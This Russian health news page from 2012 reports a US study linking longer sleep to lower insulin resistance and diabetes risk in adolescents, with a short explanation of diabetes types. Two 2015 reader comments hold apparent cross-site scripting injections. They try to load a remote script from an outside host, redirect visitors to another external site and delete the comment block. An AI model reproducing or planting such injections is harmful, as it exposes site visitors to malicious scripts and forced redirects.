Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Хороший сон спасет от диа...  >>  Хороший сон спасет от диабета
 
Обратная связь
 

Хороший сон спасет от диабета

Размер шрифта
16 ноября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые установили, что 7-часовой ночной сон позволяет предотвратить развитие сахарного диабета у подростков.

сон спасет от диабета

Что такое сахарный диабет

Сахарный диабет – это заболевание, при котором наблюдается стойкое повышение уровня глюкозы в крови. Выделяют сахарный диабет 1 типа и сахарный диабет 2 типа. При сахарном диабете 1 типа происходит разрушение клеток поджелудочной железы, в которых образуется инсулин. Инсулин необходим нашему организму для снижения уровня глюкозы в крови. Оставшиеся клетки поджелудочной железы не могут удовлетворить потребности организма в инсулине, поэтому большая часть глюкозы не поступает в клетки, а остается в крови.

При сахарном диабете 2 типа клетки поджелудочной железы не страдают, и в организме находится достаточное количество инсулина. Однако клетки теряют чувствительность к инсулину – развивается так называемая инсулинорезистентность. Если представить, что инсулин – это ключик, который открывает клетку для глюкозы, то при инсулинорезистентности ключик не подходит к замку и не может открыть клетку. В результате глюкоза не поступает в клетки и остается в крови.

Суть исследования

В исследовании приняли участи 245 здоровых студентов. Средняя продолжительность ночного сна в течение недели составила 6,4 часа, причем в будние дни продолжительность сна была значительно меньше, чем в выходные.

Чем меньше спал студент, тем более выражена была инсулинорезистентность. Как выяснили ученые, дополнительный час сна для подростков, которые обычно спят по 6 часов, позволит снизить инсулинорезистентность на 9%. А поскольку инсулинорезистентность ведет к развитию сахарного диабета, то увеличение продолжительности сна позволит предотвратить развитие заболевания.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - erevan

19 ноября 2012 в 11:34

Цитировать   |   Пожаловаться

Здоровый и крепкий сон полезен не только от сахарного диабета, но и для общего физического и психического здоровья.

2 - zzzzzz

30 июня 2015 в 21:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как выспаться   Недосып! Что происходит с вашим телом?   Задал храпака – проснулся с диабетом! Как спать, чтобы не заболеть?   Смерть от... бессоницы  
15 ноября 2012Хороший сон спасет от диабета 30 мая 2013Храпящие люди в 3 раза чаще разбиваются на машинах! Как этого избежать
 
15 января 2013«Утро вечера мудренее» – ученые доказали правоту этой поговорки 03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума?
 

Слайдшоу

1
Самые неожиданные причины усталости
Как наконец-то уснуть и выспаться
9 причин заснуть прямо сейчас

Тесты

1
Нормальный ли у вас сон?
Хорошо ли Вы спите?
Какой матрас вам подходит?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.